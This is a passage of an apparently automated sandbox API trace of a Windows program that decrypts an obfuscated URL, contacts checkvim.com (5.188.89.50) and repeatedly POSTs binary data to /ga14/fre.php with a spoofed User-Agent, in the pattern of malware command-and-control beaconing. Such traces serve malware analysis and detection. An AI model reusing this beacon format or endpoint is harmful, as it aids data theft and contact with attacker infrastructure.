pbData=0x418960, dwFlags=0x0) returned 1 [0293.285] GetProcessHeap () returned 0x840000 [0293.285] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0293.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.286] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0293.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.287] CryptDestroyKey (hKey=0x87e970) returned 1 [0293.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.288] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0293.288] GetProcessHeap () returned 0x840000 [0293.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0293.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.289] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.290] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.291] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.292] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.292] GetProcessHeap () returned 0x840000 [0293.292] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0293.293] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0293.293] GetProcessHeap () returned 0x840000 [0293.293] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0293.293] GetProcessHeap () returned 0x840000 [0293.293] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0293.293] GetProcessHeap () returned 0x840000 [0293.293] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0293.293] GetProcessHeap () returned 0x840000 [0293.293] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0293.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.294] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0293.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.301] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0293.313] GetProcessHeap () returned 0x840000 [0293.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0293.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.314] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0293.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.316] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0293.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.317] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.317] GetProcessHeap () returned 0x840000 [0293.317] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0293.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.318] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0293.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.319] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0293.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.320] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0293.320] GetProcessHeap () returned 0x840000 [0293.320] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0293.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.338] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0293.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.339] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0293.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.340] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0293.340] GetProcessHeap () returned 0x840000 [0293.340] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0293.340] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0293.341] GetProcessHeap () returned 0x840000 [0293.341] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0293.341] socket (af=2, type=1, protocol=6) returned 0x4a4 [0293.341] connect (s=0x4a4, name=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0293.411] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0293.411] GetProcessHeap () returned 0x840000 [0293.411] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0293.412] GetProcessHeap () returned 0x840000 [0293.412] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0293.412] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0293.413] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0293.413] GetProcessHeap () returned 0x840000 [0293.413] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0293.413] GetProcessHeap () returned 0x840000 [0293.413] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0293.413] GetProcessHeap () returned 0x840000 [0293.413] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0293.413] GetProcessHeap () returned 0x840000 [0293.413] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0293.414] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0293.415] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0293.415] GetProcessHeap () returned 0x840000 [0293.415] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0293.415] GetProcessHeap () returned 0x840000 [0293.415] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0293.415] send (s=0x4a4, buf=0x873a58*, len=237, flags=0) returned 237 [0293.415] send (s=0x4a4, buf=0x87eb58*, len=159, flags=0) returned 159 [0293.415] GetProcessHeap () returned 0x840000 [0293.415] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0293.416] recv (in: s=0x4a4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0293.779] GetProcessHeap () returned 0x840000 [0293.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0293.779] GetProcessHeap () returned 0x840000 [0293.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0293.779] GetProcessHeap () returned 0x840000 [0293.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0293.779] GetProcessHeap () returned 0x840000 [0293.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0293.780] closesocket (s=0x4a4) returned 0 [0293.780] GetProcessHeap () returned 0x840000 [0293.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0293.780] GetProcessHeap () returned 0x840000 [0293.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0293.780] GetProcessHeap () returned 0x840000 [0293.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0293.780] GetProcessHeap () returned 0x840000 [0293.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0293.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xe84) returned 0x4a4 [0293.783] Sleep (dwMilliseconds=0xea60) [0293.785] GetProcessHeap () returned 0x840000 [0293.785] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0293.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.787] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0293.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.794] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0293.798] GetProcessHeap () returned 0x840000 [0293.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0293.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.799] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0293.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.813] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0293.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.814] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.814] GetProcessHeap () returned 0x840000 [0293.814] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0293.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.815] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0293.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.816] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0293.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.817] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0293.817] GetProcessHeap () returned 0x840000 [0293.817] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0293.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.818] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.819] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.820] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.821] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.821] GetProcessHeap () returned 0x840000 [0293.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0293.821] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0293.821] GetProcessHeap () returned 0x840000 [0293.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0293.821] GetProcessHeap () returned 0x840000 [0293.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0293.821] GetProcessHeap () returned 0x840000 [0293.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0293.821] GetProcessHeap () returned 0x840000 [0293.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0293.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.827] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0293.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.832] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0293.837] GetProcessHeap () returned 0x840000 [0293.837] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0293.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.847] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0293.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.848] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0293.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.849] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.849] GetProcessHeap () returned 0x840000 [0293.849] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0293.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.850] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0293.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.850] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0293.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.851] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0293.851] GetProcessHeap () returned 0x840000 [0293.851] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0293.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.852] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0293.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.853] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0293.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.856] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0293.856] GetProcessHeap () returned 0x840000 [0293.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0293.856] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0293.857] GetProcessHeap () returned 0x840000 [0293.857] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0293.857] socket (af=2, type=1, protocol=6) returned 0x4a8 [0293.857] connect (s=0x4a8, name=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0293.928] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ab8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0293.928] GetProcessHeap () returned 0x840000 [0293.929] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0293.929] GetProcessHeap () returned 0x840000 [0293.929] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0293.930] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0293.931] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0293.931] GetProcessHeap () returned 0x840000 [0293.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0293.931] GetProcessHeap () returned 0x840000 [0293.931] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0293.931] GetProcessHeap () returned 0x840000 [0293.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0293.931] GetProcessHeap () returned 0x840000 [0293.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0293.933] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0293.934] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0293.934] GetProcessHeap () returned 0x840000 [0293.934] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0293.934] GetProcessHeap () returned 0x840000 [0293.934] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0293.934] send (s=0x4a8, buf=0x873a58*, len=237, flags=0) returned 237 [0293.934] send (s=0x4a8, buf=0x87eb58*, len=159, flags=0) returned 159 [0293.934] GetProcessHeap () returned 0x840000 [0293.934] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0293.934] recv (in: s=0x4a8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0294.333] GetProcessHeap () returned 0x840000 [0294.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0294.333] GetProcessHeap () returned 0x840000 [0294.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0294.333] GetProcessHeap () returned 0x840000 [0294.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0294.333] GetProcessHeap () returned 0x840000 [0294.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0294.333] closesocket (s=0x4a8) returned 0 [0294.333] GetProcessHeap () returned 0x840000 [0294.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0294.333] GetProcessHeap () returned 0x840000 [0294.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0294.333] GetProcessHeap () returned 0x840000 [0294.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0294.334] GetProcessHeap () returned 0x840000 [0294.334] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0294.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x834) returned 0x4a8 [0294.335] Sleep (dwMilliseconds=0xea60) [0294.340] GetProcessHeap () returned 0x840000 [0294.340] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0294.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.341] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0294.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.347] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0294.352] GetProcessHeap () returned 0x840000 [0294.352] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0294.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.353] CryptImportKey (in: hProv=0x86fdf8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0294.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.354] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0294.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.355] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.355] GetProcessHeap () returned 0x840000 [0294.355] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0294.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.356] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0294.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.356] CryptDestroyKey (hKey=0x87e870) returned 1 [0294.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0294.357] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0294.357] GetProcessHeap () returned 0x840000 [0294.357] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0294.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.358] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0294.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.359] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0294.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.359] StrStrA 